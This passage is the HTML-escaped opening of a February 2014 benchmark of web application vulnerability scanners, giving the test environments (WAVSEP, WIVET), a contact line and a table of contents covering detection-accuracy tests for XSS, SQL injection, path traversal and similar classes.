Unni&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;February 2014&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Assessment Environments:&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;https://code.google.com/p/wavsep/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP 1.5&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;,
&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/wivet/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WIVET
v3-rev148&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;, ZAP-WAVE (WAVSEP integration), various
undisclosed verification platforms&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;https://code.google.com/p/wavsep/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-hansi-theme-font: major-bidi;&quot;&gt;https://code.google.com/p/wavsep/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; , &lt;/span&gt;&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;sectooladdict-{at}-gmail-{dot}-com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 16.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Table of Contents&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;1. Introduction&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;2. List of Tested Web Application Scanners&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;3. Benchmark Overview &amp;amp; Assessment Criteria&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;4. A Glimpse at the Results of the Benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;5. SURPRISE, SURPRISE!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;6. How to Read and Use the Results - IMPORTANT&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;7. Test I - Scanner Versatility - Input Vector Support&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;8. Test II - WIVET - Coverage via Automated Crawling&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;9. Introduction to the Various Accuracy Assessments&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;10. Test III – The Detection Accuracy of Unvalidated
Redirect (NEW!)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;11. Test IV – The Detection Accuracy of Backup/Hidden Files&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;b&gt;(NEW!)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;12. Test V – The Detection Accuracy of Path Traversal/LFI&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;13. Test VI – The Detection Accuracy of RFI (XSS via RFI)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;14. Test VII – The Detection Accuracy of Reflected XSS&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;15. Test VIII – The Detection Accuracy of SQL Injection&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;16. Test IX – Attack Vector Support – Counting Audit
Features&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;17. Test X – Scanner Adaptability - Crawling &amp;amp; Scan
Barriers&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;18. Test XI – Authentication and Usability Feature
Comparison&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;19. Test XII – The Crown Jewel - Results &amp;amp; Features vs.
Pricing&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;20. Additional Comparisons, Built-in Products and Licenses&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;21. What Changed?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;22. Initial Conclusions – Open Source vs. Commercial&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;23. Verifying The Benchmark Results&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;24. So What Now?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;25. Recommended Reading List: Scanner Benchmarks&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;26. Acknowledgments&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;27. Appendix A – List of Tools Not Included In the Test&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;1. Introduction&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoNormalTable&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 218.05pt;&quot; valign=&quot;top&quot; width=&quot;291&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Detailed Result Presentation at&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://www.sectoolmarket.com/&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
